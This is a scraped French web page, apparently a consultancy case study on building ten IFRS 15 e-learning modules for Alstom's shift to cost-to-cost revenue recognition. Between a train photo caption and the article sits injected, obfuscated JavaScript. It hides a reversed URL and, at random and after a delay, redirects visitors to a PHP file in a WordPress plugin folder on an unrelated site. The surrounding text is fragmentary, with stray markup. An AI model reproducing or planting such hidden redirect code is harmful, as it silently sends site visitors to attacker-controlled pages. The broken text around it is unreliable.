Regional express train at Tours station - France

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-titre-texte-gris”]Mission pour Alstom : Modules de formation e-learning IFRS 15

Contexte / Enjeux

L’application d’IFRS 15 représente un important changement culturel pour Alstom, puisque les modalités de reconnaissance du revenu (autant dire : la base de l’activité au quotidien) ont changé.

Alstom est passé d’un mode de reconnaissance des revenus sur la base de jalons physiques (milestones) à une reconnaissance sur les coûts encourus (cost-to-cost).

Afin d’accompagner ce changement, qui touche aussi bien les financiers que les non financiers, un vaste programme e-learning a été mis en place dont nous avons assuré la conception de bout en bout.

Périmètre et cible

L’ensemble des financiers et des opérationnels concernés

Modalités d’intervention et outils pédagogiques

Nous avons élaboré pour Alstom un ensemble de 10 modules e-learning couvrant tous les aspects de la mise en œuvre et implications de la nouvelle norme IFRS sur la reconnaissance du chiffre d’affaires.

Résultats

Ces modules sont en cours de déploiement.